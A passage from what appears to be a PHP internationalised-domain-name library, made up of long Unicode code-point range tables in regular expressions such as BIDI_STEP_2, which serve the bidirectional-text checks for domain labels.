-\\x{07C9}\\x{07CA}-\\x{07EA}\\x{07F4}-\\x{07F5}\\x{07FA}\\x{07FB}-\\x{07FC}\\x{07FE}-\\x{07FF}\\x{0800}-\\x{0815}\\x{081A}\\x{0824}\\x{0828}\\x{082E}-\\x{082F}\\x{0830}-\\x{083E}\\x{083F}\\x{0840}-\\x{0858}\\x{085C}-\\x{085D}\\x{085E}\\x{085F}\\x{0860}-\\x{086A}\\x{086B}-\\x{086F}\\x{0870}-\\x{089F}\\x{08A0}-\\x{08B4}\\x{08B5}\\x{08B6}-\\x{08C7}\\x{08C8}-\\x{08D2}\\x{200F}\\x{FB1D}\\x{FB1F}-\\x{FB28}\\x{FB2A}-\\x{FB36}\\x{FB37}\\x{FB38}-\\x{FB3C}\\x{FB3D}\\x{FB3E}\\x{FB3F}\\x{FB40}-\\x{FB41}\\x{FB42}\\x{FB43}-\\x{FB44}\\x{FB45}\\x{FB46}-\\x{FB4F}\\x{FB50}-\\x{FBB1}\\x{FBB2}-\\x{FBC1}\\x{FBC2}-\\x{FBD2}\\x{FBD3}-\\x{FD3D}\\x{FD40}-\\x{FD4F}\\x{FD50}-\\x{FD8F}\\x{FD90}-\\x{FD91}\\x{FD92}-\\x{FDC7}\\x{FDC8}-\\x{FDCF}\\x{FDF0}-\\x{FDFB}\\x{FDFC}\\x{FDFE}-\\x{FDFF}\\x{FE70}-\\x{FE74}\\x{FE75}\\x{FE76}-\\x{FEFC}\\x{FEFD}-\\x{FEFE}\\x{10800}-\\x{10805}\\x{10806}-\\x{10807}\\x{10808}\\x{10809}\\x{1080A}-\\x{10835}\\x{10836}\\x{10837}-\\x{10838}\\x{10839}-\\x{1083B}\\x{1083C}\\x{1083D}-\\x{1083E}\\x{1083F}-\\x{10855}\\x{10856}\\x{10857}\\x{10858}-\\x{1085F}\\x{10860}-\\x{10876}\\x{10877}-\\x{10878}\\x{10879}-\\x{1087F}\\x{10880}-\\x{1089E}\\x{1089F}-\\x{108A6}\\x{108A7}-\\x{108AF}\\x{108B0}-\\x{108DF}\\x{108E0}-\\x{108F2}\\x{108F3}\\x{108F4}-\\x{108F5}\\x{108F6}-\\x{108FA}\\x{108FB}-\\x{108FF}\\x{10900}-\\x{10915}\\x{10916}-\\x{1091B}\\x{1091C}-\\x{1091E}\\x{10920}-\\x{10939}\\x{1093A}-\\x{1093E}\\x{1093F}\\x{10940}-\\x{1097F}\\x{10980}-\\x{109B7}\\x{109B8}-\\x{109BB}\\x{109BC}-\\x{109BD}\\x{109BE}-\\x{109BF}\\x{109C0}-\\x{109CF}\\x{109D0}-\\x{109D1}\\x{109D2}-\\x{109FF}\\x{10A00}\\x{10A04}\\x{10A07}-\\x{10A0B}\\x{10A10}-\\x{10A13}\\x{10A14}\\x{10A15}-\\x{10A17}\\x{10A18}\\x{10A19}-\\x{10A35}\\x{10A36}-\\x{10A37}\\x{10A3B}-\\x{10A3E}\\x{10A40}-\\x{10A48}\\x{10A49}-\\x{10A4F}\\x{10A50}-\\x{10A58}\\x{10A59}-\\x{10A5F}\\x{10A60}-\\x{10A7C}\\x{10A7D}-\\x{10A7E}\\x{10A7F}\\x{10A80}-\\x{10A9C}\\x{10A9D}-\\x{10A9F}\\x{10AA0}-\\x{10ABF}\\x{10AC0}-\\x{10AC7}\\x{10AC8}\\x{10AC9}-\\x{10AE4}\\x{10AE7}-\\x{10AEA}\\x{10AEB}-\\x{10AEF}\\x{10AF0}-\\x{10AF6}\\x{10AF7}-\\x{10AFF}\\x{10B00}-\\x{10B35}\\x{10B36}-\\x{10B38}\\x{10B40}-\\x{10B55}\\x{10B56}-\\x{10B57}\\x{10B58}-\\x{10B5F}\\x{10B60}-\\x{10B72}\\x{10B73}-\\x{10B77}\\x{10B78}-\\x{10B7F}\\x{10B80}-\\x{10B91}\\x{10B92}-\\x{10B98}\\x{10B99}-\\x{10B9C}\\x{10B9D}-\\x{10BA8}\\x{10BA9}-\\x{10BAF}\\x{10BB0}-\\x{10BFF}\\x{10C00}-\\x{10C48}\\x{10C49}-\\x{10C7F}\\x{10C80}-\\x{10CB2}\\x{10CB3}-\\x{10CBF}\\x{10CC0}-\\x{10CF2}\\x{10CF3}-\\x{10CF9}\\x{10CFA}-\\x{10CFF}\\x{10D00}-\\x{10D23}\\x{10D28}-\\x{10D2F}\\x{10D3A}-\\x{10D3F}\\x{10D40}-\\x{10E5F}\\x{10E7F}\\x{10E80}-\\x{10EA9}\\x{10EAA}\\x{10EAD}\\x{10EAE}-\\x{10EAF}\\x{10EB0}-\\x{10EB1}\\x{10EB2}-\\x{10EFF}\\x{10F00}-\\x{10F1C}\\x{10F1D}-\\x{10F26}\\x{10F27}\\x{10F28}-\\x{10F2F}\\x{10F30}-\\x{10F45}\\x{10F51}-\\x{10F54}\\x{10F55}-\\x{10F59}\\x{10F5A}-\\x{10F6F}\\x{10F70}-\\x{10FAF}\\x{10FB0}-\\x{10FC4}\\x{10FC5}-\\x{10FCB}\\x{10FCC}-\\x{10FDF}\\x{10FE0}-\\x{10FF6}\\x{10FF7}-\\x{10FFF}\\x{1E800}-\\x{1E8C4}\\x{1E8C5}-\\x{1E8C6}\\x{1E8C7}-\\x{1E8CF}\\x{1E8D7}-\\x{1E8FF}\\x{1E900}-\\x{1E943}\\x{1E94B}\\x{1E94C}-\\x{1E94F}\\x{1E950}-\\x{1E959}\\x{1E95A}-\\x{1E95D}\\x{1E95E}-\\x{1E95F}\\x{1E960}-\\x{1EC6F}\\x{1EC70}\\x{1EC71}-\\x{1ECAB}\\x{1ECAC}\\x{1ECAD}-\\x{1ECAF}\\x{1ECB0}\\x{1ECB1}-\\x{1ECB4}\\x{1ECB5}-\\x{1ECBF}\\x{1ECC0}-\\x{1ECFF}\\x{1ED00}\\x{1ED01}-\\x{1ED2D}\\x{1ED2E}\\x{1ED2F}-\\x{1ED3D}\\x{1ED3E}-\\x{1ED4F}\\x{1ED50}-\\x{1EDFF}\\x{1EE00}-\\x{1EE03}\\x{1EE04}\\x{1EE05}-\\x{1EE1F}\\x{1EE20}\\x{1EE21}-\\x{1EE22}\\x{1EE23}\\x{1EE24}\\x{1EE25}-\\x{1EE26}\\x{1EE27}\\x{1EE28}\\x{1EE29}-\\x{1EE32}\\x{1EE33}\\x{1EE34}-\\x{1EE37}\\x{1EE38}\\x{1EE39}\\x{1EE3A}\\x{1EE3B}\\x{1EE3C}-\\x{1EE41}\\x{1EE42}\\x{1EE43}-\\x{1EE46}\\x{1EE47}\\x{1EE48}\\x{1EE49}\\x{1EE4A}\\x{1EE4B}\\x{1EE4C}\\x{1EE4D}-\\x{1EE4F}\\x{1EE50}\\x{1EE51}-\\x{1EE52}\\x{1EE53}\\x{1EE54}\\x{1EE55}-\\x{1EE56}\\x{1EE57}\\x{1EE58}\\x{1EE59}\\x{1EE5A}\\x{1EE5B}\\x{1EE5C}\\x{1EE5D}\\x{1EE5E}\\x{1EE5F}\\x{1EE60}\\x{1EE61}-\\x{1EE62}\\x{1EE63}\\x{1EE64}\\x{1EE65}-\\x{1EE66}\\x{1EE67}-\\x{1EE6A}\\x{1EE6B}\\x{1EE6C}-\\x{1EE72}\\x{1EE73}\\x{1EE74}-\\x{1EE77}\\x{1EE78}\\x{1EE79}-\\x{1EE7C}\\x{1EE7D}\\x{1EE7E}\\x{1EE7F}\\x{1EE80}-\\x{1EE89}\\x{1EE8A}\\x{1EE8B}-\\x{1EE9B}\\x{1EE9C}-\\x{1EEA0}\\x{1EEA1}-\\x{1EEA3}\\x{1EEA4}\\x{1EEA5}-\\x{1EEA9}\\x{1EEAA}\\x{1EEAB}-\\x{1EEBB}\\x{1EEBC}-\\x{1EEEF}\\x{1EEF2}-\\x{1EEFF}\\x{1EF00}-\\x{1EFFF}]/u'; const BIDI_STEP_2 = '/[^\\x{0000}-\\x{0008}\\x{000E}-\\x{001B}\\x{0021}-\\x{0022}\\x{0023}\\x{0024}\\x{0025}\\x{0026}-\\x{0027}\\x{0028}\\x{0029}\\x{002A}\\x{002B}\\x{002C}\\x{002D}\\x{002E}-\\x{002F}\\x{0030}-\\x{0039}\\x{003A}\\x{003B}\\x{003C}-\\x{003E}\\x{003F}-\\x{0040}\\x{005B}\\x{005C}\\x{005D}\\x{005E}\\x{005F}\\x{0060}\\x{007B}\\x{007C}\\x{007D}\\x{007E}\\x{007F}-\\x{0084}\\x{0086}-\\x{009F}\\x{00A0}\\x{00A1}\\x{00A2}-\\x{00A5}\\x{00A6}\\x{00A7}\\x{00A8}\\x{00A9}\\x{00AB}\\x{00AC}\\x{00AD}\\x{00AE}\\x{00AF}\\x{00B0}\\x{00B1}\\x{00B2}-\\x{00B3}\\x{00B4}\\x{00B6}-\\x{00B7}\\x{00B8}\\x{00B9}\\x{00BB}\\x{00BC}-\\x{00BE}\\x{00BF}\\x{00D7}\\x{00F7}\\x{02B9}-\\x{02BA}\\x{02C2}-\\x{02C5}\\x{02C6}-\\x{02CF}\\x{02D2}-\\x{02DF}\\x{02E5}-\\x{02EB}\\x{02EC}\\x{02ED}\\x{02EF}-\\x{02FF}\\x{0300}-\\x{036F}\\x{0374}\\x{0375}\\x{037E}\\x{0384}-\\x{0385}\\x{0387}\\x{03F6}\\x{0483}-\\x{0487}\\x{0488}-\\x{0489}\\x{058A}\\x{058D}-\\x{058E}\\x{058F}\\x{0590}\\x{0591}-\\x{05BD}\\x{05BE}\\x{05BF}\\x{05C0}\\x{05C1}-\\x{05C2}\\x{05C3}\\x{05C4}-\\x{05C5}\\x{05C6}\\x{05C7}\\x{05C8}-\\x{05CF}\\x{05D0}-\\x{05EA}\\x{05EB}-\\x{05EE}\\x{05EF}-\\x{05F2}\\x{05F3}-\\x{05F4}\\x{05F5}-\\x{05FF}\\x{0600}-\\x{0605}\\x{0606}-\\x{0607}\\x{0608}\\x{0609}-\\x{060A}\\x{060B}\\x{060C}\\x{060D}\\x{060E}-\\x{060F}\\x{0610}-\\x{061A}\\x{061B}\\x{061C}\\x{061D}\\x{061E}-\\x{061F}\\x{0620}-\\x{063F}\\x{0640}\\x{0641}-\\x{064A}\\x{064B}-\\x{065F}\\x{0660}-\\x{0669}\\x{066A}\\x{066B}-\\x{066C}\\x{066D}\\x{066E}-\\x{066F}\\x{0670}\\x{0671}-\\x{06D3}\\x{06D4}\\x{06D5}\\x{06D6}-\\x{06DC}\\x{06DD}\\x{06DE}\\x{06DF}-\\x{06E4}\\x{06E5}-\\x{06E6}\\x{06E7}-\\x{06E8}\\x{06E9}\\x{06EA}-\\x{06ED}\\x{06EE}-\\x{06EF}\\x{06F0}-\\x{06F9}\\x{06FA}-\\x{06FC}\\x{06FD}-\\x{06FE}\\x{06FF}\\x{0700}-\\x{070D}\\x{070E}\\x{070F}\\x{0710}\\x{0711}\\x{0712}-\\x{072F}\\x{0730}-\\x{074A}\\x{074B}-\\x{074C}\\x{074D}-\\x{07A5}\\x{07A6}-\\x{07B0}\\x{07B1}\\x{07B2}-\\x{07BF}\\x{07C0}-\\x{07C9}\\x{07CA}-\\x{07EA}\\x{07EB}-\\x{07F3}\\x{07F4}-\\x{07F5}\\x{07F6}\\x{07F7}-\\x{07F9}\\x{07FA}\\x{07FB}-\\x{07FC}\\x{07FD}\\x{07FE}-\\x{07FF}\\x{0800}-\\x{0815}\\x{0816}-\\x{0819}\\x{081A}\\x{081B}-\\x{0823}\\x{0824}\\x{0825}-\\x{0827}\\x{0828}\\x{0829}-\\x{082D}\\x{082E}-\\x{082F}\\x{0830}-\\x{083E}\\x{083F}\\x{0840}-\\x{0858}\\x{0859}-\\x{085B}\\x{085C}-\\x{085D}\\x{085E}\\x{085F}\\x{0860}-\\x{086A}\\x{086B}-\\x{086F}\\x{0870}-\\x{089F}\\x{08A0}-\\x{08B4}\\x{08B5}\\x{08B6}-\\x{08C7}\\x{08C8}-\\x{08D2}\\x{08D3}-\\x{08E1}\\x{08E2}\\x{08E3}-\\x{0902}\\x{093A}\\x{093C}\\x{0941}-\\x{0948}\\x{094D}\\x{0951}-\\x{0957}\\x{0962}-\\x{0963}\\x{0981}\\x{09BC}\\x{09C1}-\\x{09C4}\\x{09CD}\\x{09E2}-\\x{09E3}\\x{09F2}-\\x{09F3}\\x{09FB}\\x{09FE}\\x{0A01}-\\x{0A02}\\x{0A3C}\\x{0A41}-\\x{0A42}\\x{0A47}-\\x{0A48}\\x{0A4B}-\\x{0A4D}\\x{0A51}\\x{0A70}-\\x{0A71}\\x{0A75}\\x{0A81}-\\x{0A82}\\x{0ABC}\\x{0AC1}-\\x{0AC5}\\x{0AC7}-\\x{0AC8}\\x{0ACD}\\x{0AE2}-\\x{0AE3}\\x{0AF1}\\x{0AFA}-\\x{0AFF}\\x{0B01}\\x{0B3C}\\x{0B3F}\\x{0B41}-\\x{0B44}\\x{0B4D}\\x{0B55}-\\x{0B56}\\x{0B62}-\\x{0B63}\\x{0B82}\\x{0BC0}\\x{0BCD}\\x{0BF3}-\\x{0BF8}\\x{0BF9}\\x{0BFA}\\x{0C00}\\x{0C04}\\x{0C3E}-\\x{0C40}\\x{0C46}-\\x{0C48}\\x{0C4A}-\\x{0C4D}\\x{0C55}-\\x{0C56}\\x{0C62}-\\x{0C63}\\x{0C78}-\\x{0C7E}\\x{0C81}\\x{0CBC}\\x{0CCC}-\\x{0CCD}\\x{0CE2}-\\x{0CE3}\\x{0D00}-\\x{0D01}\\x{0D3B}-\\x{0D3C}\\x{0D41}-\\x{0D44}\\x{0D4D}\\x{0D62}-\\x{0D63}\\x{0D81}\\x{0DCA}\\x{0DD2}-\\x{0DD4}\\x{0DD6}\\x{0E31}\\x{0E34}-\\x{0E3A}\\x{0E3F}\\x{0E47}-\\x{0E4E}\\x{0EB1}\\x{0EB4}-\\x{0EBC}\\x{0EC8}-\\x{0ECD}\\x{0F18}-\\x{0F19}\\x{0F35}\\x{0F37}\\x{0F39}\\x{0F3A}\\x{0F3B}\\x{0F3C}\\x{0F3D}\\x{0F71}-\\x{0F7E}\\x{0F80}-\\x{0F84}\\x{0F86}-\\x{0F87}\\x{0F8D}-\\x{0F97}\\x{0F99}-\\x{0FBC}\\x{0FC6}\\x{102D}-\\x{1030}\\x{1032}-\\x{1037}\\x{1039}-\\x{103A}\\x{103D}-\\x{103E}\\x{1058}-\\x{1059}\\x{105E}-\\x{1060}\\x{1071}-\\x{1074}\\x{1082}\\x{1085}-\\x{1086}\\x{108D}\\x{109D}\\x{135D}-\\x{135F}\\x{1390}-\\x{1399}\\x{1400}\\x{169B}\\x{169C}\\x{1712}-\\x{1714}\\x{1732}-\\x{1734}\\x{1752}-\\x{1753}\\x{1772}-\\x{1773}\\x{17B4}-\\x{17B5}\\x{17B7}-\\x{17BD}\\x{17C6}\\x{17C9}-\\x{17D3}\\x{17DB}\\x{17DD}\\x{17F0}-\\x{17F9}\\x{1800}-\\x{1805}\\x{1806}\\x{1807}-\\x{180A}\\x{180B}-\\x{180D}\\x{180E}\\x{1885}-\\x{1886}\\x{18A9}\\x{1920}-\\x{1922}\\x{1927}-\\x{1928}\\x{1932}\\x{1939}-\\x{193B}\\x{1940}\\x{1944}-\\x{1945}\\x{19DE}-\\x{19FF}\\x{1A17}-\\x{1A18}\\x{1A1B}\\x{1A56}\\x{1A58}-\\x{1A5E}\\x{1A60}\\x{1A62}\\x{1A65}-\\x{1A6C}\\x{1A73}-\\x{1A7C}\\x{1A7F}\\x{1AB0}-\\x{1ABD}\\x{1ABE}\\x{1ABF}-\\x{1AC0}\\x{1B00}-\\x{1B03}\\x{1B34}\\x{1B36}-\\x{1B3A}\\x{1B3C}\\x{1B42}\\x{1B6B}-\\x{1B73}\\x{1B80}-\\x{1B81}\\x{1BA2}-\\x{1BA5}\\x{1BA8}-\\x{1BA9}\\x{1BAB}-\\x{1BAD}\\x{1BE6}\\x{1BE8}-\\x{1BE9}\\x{1BED}\\x{1BEF}-\\x{1BF1}\\x{1C2C}-\\x{1C33}\\x{1C36}-\\x{1C37}\\x{1CD0}-\\x{1CD2}\\x{1CD4}-\\x{1CE0}\\x{1CE2}-\\x{1CE8}\\x{1CED}\\x{1CF4}\\x{1CF8}-\\x{1CF9}\\x{1DC0}-\\x{1DF9}\\x{1DFB}-\\x{1DFF}\\x{1FBD}\\x{1FBF}-\\x{1FC1}\\x{1FCD}-\\x{1FCF}\\x{1FDD}-\\x{1FDF}\\x{1FED}-\\x{1FEF}\\x{1FFD}-\\x{1FFE}\\x{200B}-\\x{200D}\\x{200F}\\x{2010}-\\x{2015}\\x{2016}-\\x{2017}\\x{2018}\\x{2019}\\x{201A}\\x{201B}-\\x{201C}\\x{201D}\\x{201E}\\x{201F}\\x{2020}-\\x{2027}\\x{202F}\\x{2030}-\\x{2034}\\x{2035}-\\x{2038}\\x{2039}\\x{203A}\\x{203B}-\\x{203E}\\x{203F}-\\x{2040}\\x{2041}-\\x{2043}\\x{2044}\\x{2045}\\x{2046}\\x{2047}-\\x{2051}\\x{2052}\\x{2053}\\x{2054}\\x{2055}-\\x{205E}\\x{2060}-\\x{2064}\\x{2065}\\x{206A}-\\x{206F}\\x{2070}\\x{2074}-\\x{2079}\\x{207A}-\\x{207B}\\x{207C}\\x{207D}\\x{207E}\\x{2080}-\\x{2089}\\x{208A}-\\x{208B}\\x{208C}\\x{208D}\\x{208E}\\x{20A0}-\\x{20BF}\\x{20C0}-\\x{20CF}\\x{20D0}-\\x{20DC}\\x{20DD}-\\x{20E0}\\x{20E1}\\x{20E2}-\\x{20E4}\\x{20E5}-\\x{20F0}\\x{2100}-\\x{2101}\\x{2103}-\\x{2106}\\x{2108}-\\x{2109}\\x{2114}\\x{2116}-\\x{2117}\\x{2118}\\x{211E}-\\x{2123}\\x{2125}\\x{2127}\\x{2129}\\x{212E}\\x{213A}-\\x{213B}\\x{2140}-\\x{2144}\\x{214A}\\x{214B}\\x{214C}-\\x{214D}\\x{2150}-\\x{215F}\\x{2189}\\x{218A}-\\x{218B}\\x{2190}-\\x{2194}\\x{2195}-\\x{2199}\\x{219A}-\\x{219B}\\x{219C}-\\x{219F}\\x{21A0}\\x{21A1}-\\x{21A2}\\x{21A3}\\x{21A4}-\\x{21A5}\\x{21A6}\\x{21A7}-\\x{21AD}\\x{21AE}\\x{21AF}-\\x{21CD}\\x{21CE}-\\x{21CF}\\x{21D0}-\\x{21D1}\\x{21D2}\\x{21D3}\\x{21D4}\\x{21D5}-\\x{21F3}\\x{21F4}-\\x{2211}\\x{2212}\\x{2213}\\x{2214}-\\x{22FF}\\x{2300}-\\x{2307}\\x{2308}\\x{2309}\\x{230A}\\x{230B}\\x{230C}-\\x{231F}\\x{2320}-\\x{2321}\\x{2322}-\\x{2328}\\x{2329}\\x{232A}\\x{232B}-\\x{2335}\\x{237B}\\x{237C}\\x{237D}-\\x{2394}\\x{2396}-\\x{239A}\\x{239B}-\\x{23B3}\\x{23B4}-\\x{23DB}\\x{23DC}-\\x{23E1}\\x{23E2}-\\x{2426}\\x{2440}-\\x{244A}\\x{2460}-\\x{2487}\\x{2488}-\\x{249B}\\x{24EA}-\\x{24FF}\\x{2500}-\\x{25B6}\\x{25B7}\\x{25B8}-\\x{25C0}\\x{25C1}\\x{25C2}-\\x{25F7}\\x{25F8}-\\x{25FF}\\x{2600}-\\x{266E}\\x{266F}\\x{2670}-\\x{26AB}\\x{26AD}-\\x{2767}\\x{2768}\\x{2769}\\x{276A}\\x{276B}\\x{276C}\\x{276D}\\x{276E}\\x{276F}\\x{2770}\\x{2771}\\x{2772}\\x{2773}\\x{2774}\\x{2775}\\x{2776}-\\x{2793}\\x{2794}-\\x{27BF}\\x{27C0}-\\x{27C4}\\x{27C5}\\x{27C6}\\x{27C7}-\\x{27E5}\\x{27E6}\\x{27E7}\\x{27E8}\\x{27E9}\\x{27EA}\\x{27EB}\\x{27EC}\\x{27ED}\\x{27EE}\\x{27EF}\\x{27F0}-\\x{27FF}\\x{2900}-\\x{2982}\\x{2983}\\x{2984}\\x{2985}\\x{2986}\\x{2987}\\x{2988}\\x{2989}\\x{298A}\\x{298B}\\x{298C}\\x{298D}\\x{298E}\\x{298F}\\x{2990}\\x{2991}\\x{2992}\\x{2993}\\x{2994}\\x{2995}\\x{2996}\\x{2997}\\x{2998}\\x{2999}-\\x{29D7}\\x{29D8}\\x{29D9}\\x{29DA}\\x{29DB}\\x{29DC}-\\x{29FB}\\x{29FC}\\x{29FD}\\x{29FE}-\\x{2AFF}\\x{2B00}-\\x{2B2F}\\x{2B30}-\\x{2B44}\\x{2B45}-\\x{2B46}\\x{2B47}-\\x{2B4C}\\x{2B4D}-\\x{2B73}\\x{2B76}-\\x{2B95}\\x{2B97}-\\x{2BFF}\\x{2CE5}-\\x{2CEA}\\x{2CEF}-\\x{2CF1}\\x{2CF9}-\\x{2CFC}\\x{2CFD}\\x{2CFE}-\\x{2CFF}\\x{2D7F}\\x{2DE0}-\\x{2DFF}\\x{2E00}-\\x{2E01}\\x{2E02}\\x{2E03}\\x{2E04}\\x{2E05}\\x{2E06}-\\x{2E08}\\x{2E09}\\x{2E0A}\\x{2E0B}\\x{2E0C}\\x{2E0D}\\x{2E0E}-\\x{2E16}\\x{2E17}\\x{2E18}-\\x{2E19}\\x{2E1A}\\x{2E1B}\\x{2E1C}\\x{2E1D}\\x{2E1E}-\\x{2E1F}\\x{2E20}\\x{2E21}\\x{2E22}\\x{2E23}\\x{2E24}\\x{2E25}\\x{2E26}\\x{2E27}\\x{2E28}\\x{2E29}\\x{2E2A}-\\x{2E2E}\\x{2E2F}\\x{2E30}-\\x{2E39}\\x{2E3A}-\\x{2E3B}\\x{2E3C}-\\x{2E3F}\\x{2E40}\\x{2E41}\\x{2E42}\\x{2E43}-\\x{2E4F}\\x{2E50}-\\x{2E51}\\x{2E52}\\x{2E80}-\\x{2E99}\\x{2E9B}-\\x{2EF3}\\x{2F00}-\\x{2FD5}\\x{2FF0}-\\x{2FFB}\\x{3001}-\\x{3003}\\x{3004}\\x{3008}\\x{3009}\\x{300A}\\x{300B}\\x{300C}\\x{300D}\\x{300E}\\x{300F}\\x{3010}\\x{3011}\\x{3012}-\\x{3013}\\x{3014}\\x{3015}\\x{3016}\\x{3017}\\x{3018}\\x{3019}\\x{301A}\\x{301B}\\x{301C}\\x{301D}\\x{301E}-\\x{301F}\\x{3020}\\x{302A}-\\x{302D}\\x{3030}\\x{3036}-\\x{3037}\\x{303D}\\x{303E}-\\x{303F}\\x{3099}-\\x{309A}\\x{309B}-\\x{309C}\\x{30A0}\\x{30FB}\\x{31C0}-\\x{31E3}\\x{321D}-\\x{321E}\\x{3250}\\x{3251}-\\x{325F}\\x{327C}-\\x{327E}\\x{32B1}-\\x{32BF}\\x{32CC}-\\x{32CF}\\x{3377}-\\x{337A}\\x{33DE}-\\x{33DF}\\x{33FF}\\x{4DC0}-\\x{4DFF}\\x{A490}-\\x{A4C6}\\x{A60D}-\\x{A60F}\\x{A66F}\\x{A670}-\\x{A672}\\x{A673}\\x{A674}-\\x{A67D}\\x{A67E}\\x{A67F}\\x{A69E}-\\x{A69F}\\x{A6F0}-\\x{A6F1}\\x{A700}-\\x{A716}\\x{A717}-\\x{A71F}\\x{A720}-\\x{A721}\\x{A788}\\x{A802}\\x{A806}\\x{A80B}\\x{A825}-\\x{A826}\\x{A828}-\\x{A82B}\\x{A82C}\\x{A838}\\x{A839}\\x{A874}-\\x{A877}\\x{A8C4}-\\x{A8C5}\\x{A8E0}-\\x{A8F1}\\x{A8FF}\\x{A926}-\\x{A92D}\\x{A947}-\\x{A951}\\x{A980}-\\x{A982}\\x{A9B3}\\x{A9B6}-\\x{A9B9}\\x{A9BC}-\\x{A9BD}\\x{A9E5}\\x{AA29}-\\x{AA2E}\\x{AA31}-\\x{AA32}\\x{AA35}-\\x{AA36}\\x{AA43}\\x{AA4C}\\x{AA7C}\\x{AAB0}\\x{AAB2}-\\x{AAB4}\\x{AAB7}-\\x{AAB8}\\x{AABE}-\\x{AABF}\\x{AAC1}\\x{AAEC}-\\x{AAED}\\x{AAF6}\\x{AB6A}-\\x{AB6B}\\x{ABE5}\\x{ABE8}\\x{ABED}\\x{FB1D}\\x{FB1E}\\x{FB1F}-\\x{FB28}\\x{FB29}\\x{FB2A}-\\x{FB36}\\x{FB37}\\x{FB38}-\\x{FB3C}\\x{FB3D}\\x{FB3E}\\x{FB3F}\\x{FB40}-\\x{FB41}\\x{FB42}\\x{FB43}-\\x{FB44}\\x{FB45}\\x{FB46}-\\x{FB4F}\\x{FB50}-\\x{FBB1}\\x{FBB2}-\\x{FBC1}\\x{FBC2}-\\x{FBD2}\\x{FBD3}-\\x{FD3D}\\x{FD3E}\\x{FD3F}\\x{FD40}-\\x{FD4F}\\x{FD50}-\\x{FD8F}\\x{FD90}-\\x{FD91}\\x{FD92}-\\x{FDC7}\\x{FDC8}-\\x{FDCF}\\x{FDD0}-\\x{FDEF}\\x{FDF0}-\\x{FDFB}\\x{FDFC}\\x{FDFD}\\x{FDFE}-\\x{FDFF}\\x{FE00}-\\x{FE0F}\\x{FE10}-\\x{FE16}\\x{FE17}\\x{FE18}\\x{FE19}\\x{FE20}-\\x{FE2F}\\x{FE30}\\x{FE31}-\\x{FE32}\\x{FE33}-\\x{FE34}\\x{FE35}\\x{FE36}\\x{FE37}\\x{FE38}\\x{FE39}\\x{FE3A}\\x{FE3B}\\x{FE3C}\\x{FE3D}\\x{FE3E}\\x{FE3F}\\x{FE40}\\x{FE41}\\x{FE42}\\x{FE43}\\x{FE44}\\x{FE45}-\\x{FE46}\\x{FE47}\\x{FE48}\\x{FE49}-\\x{FE4C}\\x{FE4D}-\\x{FE4F}\\x{FE50}\\x{FE51}\\x{FE52}\\x{FE54}\\x{FE55}\\x{FE56}-\\x{FE57}\\x{FE58}\\x{FE59}\\x{FE5A}\\x{FE5B}\\x{FE5C}\\x{FE5D}\\x{FE5E}\\x{FE5F}\\x{FE60}-\\x{FE61}\\x{FE62}\\x{FE63}\\x{FE64}-\\x{FE66}\\x{FE68}\\x{FE69}\\x{FE6A}\\x{FE6B}\\x{FE70}-\\x{FE74}\\x{FE75}\\x{FE76}-\\x{FEFC}\\x{FEFD}-\\x{FEFE}\\x{FEFF}\\x{FF01}-\\x{FF02}\\x{FF03}\\x{FF04}\\x{FF05}\\x{FF06}-\\x{FF07}\\x{FF08}\\x{FF09}\\x{FF0A}\\x{FF0B}\\x{FF0C}\\x{FF0D}\\x{FF0E}-\\x{FF0F}\\x{FF10}-\\x{FF19}\\x{FF1A}\\x{FF1B}\\x{FF1C}-\\x{FF1E}\\x{FF1F}-\\x{FF20}\\x{FF3B}\\x{FF3C}\\x{FF3D}\\x{FF3E}\\x{FF3F}\\x{FF40}\\x{FF5B}\\x{FF5C}\\x{FF5D}\\x{FF5E}\\x{FF5F}\\x{FF60}\\x{FF61}\\x{FF62}\\x{FF63}\\x{FF64}-\\x{FF65}\\x{FFE0}-\\x{FFE1}\\x{FFE2}\\x{FFE3}\\x{FFE4}\\x{FFE5}-\\x{FFE6}\\x{FFE8}\\x{FFE9}-\\x{FFEC}\\x{FFED}-\\x{FFEE}\\x{FFF0}-\\x{FFF8}\\x{FFF9}-\\x{FFFB}\\x{FFFC}-\\x{FFFD}\\x{FFFE}-\\x{FFFF}\\x{10101}\\x{10140}-\\x{10174}\\x{10175}-\\x{10178}\\x{10179}-\\x{10189}\\x{1018A}-\\x{1018B}\\x{1018C}\\x{10190}-\\x{1019C}\\x{101A0}\\x{101FD}\\x{102E0}\\x{102E1}-\\x{102FB}\\x{10376}-\\x{1037A}\\x{10800}-\\x{10805}\\x{10806}-\\x{10807}\\x{10808}\\x{10809}\\x{1080A}-\\x{10835}\\x{10836}\\x{10837}-\\x{10838}\\x{10839}-\\x{1083B}\\x{1083C}\\x{1083D}-\\x{1083E}\\x{1083F}-\\x{10855}\\x{10856}\\x{10857}\\x{10858}-\\x{1085F}\\x{10860}-\\x{10876}\\x{10877}-\\x{10878}\\x{10879}-\\x{1087F}\\x{10880}-\\x{1089E}\\x{1089F}-\\x{108A6}\\x{108A7}-\\x{108AF}\\x{108B0}-\\x{108DF}\\x{108E0}-\\x{108F2}\\x{108F3}\\x{108F4}-\\x{108F5}\\x{108F6}-\\x{108FA}\\x{108FB}-\\x{108FF}\\x{10900}-\\x{10915}\\x{10916}-\\x{1091B}\\x{1091C}-\\x{1091E}\\x{1091F}\\x{10920}-\\x{10939}\\x{1093A}-\\x{1093E}\\x{1093F}\\x{10940}-\\x{1097F}\\x{10980}-\\x{109B7}\\x{109B8}-\\x{109BB}\\x{109BC}-\\x{109BD}\\x{109BE}-\\x{109BF}\\x{109C0}-\\x{109CF}\\x{109D0}-\\x{109D1}\\x{109D2}-\\x{109FF}\\x{10A00}\\x{10A01}-\\x{10A03}\\x{10A04}\\x{10A05}-\\x{10A06}\\x{10A07}-\\x{10A0B}\\x{10A0C}-\\x{10A0F}\\x{10A10}-\\x{10A13}\\x{10A14}\\x{10A15}-\\x{10A17}\\x{10A18}\\x{10A19}-\\x{10A35}\\x{10A36}-\\x{10A37}\\x{10A38}-\\x{10A3A}\\x{10A3B}-\\x{10A3E}\\x{10A3F}\\x{10A40}-\\x{10A48}\\x{10A49}-\\x{10A4F}\\x{10A50}-\\x{10A58}\\x{10A59}-\\x{10A5F}\\x{10A60}-\\x{10A7C}\\x{10A7D}-\\x{10A7E}\\x{10A7F}\\x{10A80}-\\x{10A9C}\\x{10A9D}-\\x{10A9F}\\x{10AA0}-\\x{10ABF}\\x{10AC0}-\\x{10AC7}\\x{10AC8}\\x{10AC9}-\\x{10AE4}\\x{10AE5}-\\x{10AE6}\\x{10AE7}-\\x{10AEA}\\x{10AEB}-\\x{10AEF}\\x{10AF0}-\\x{10AF6}\\x{10AF7}-\\x{10AFF}\\x{10B00}-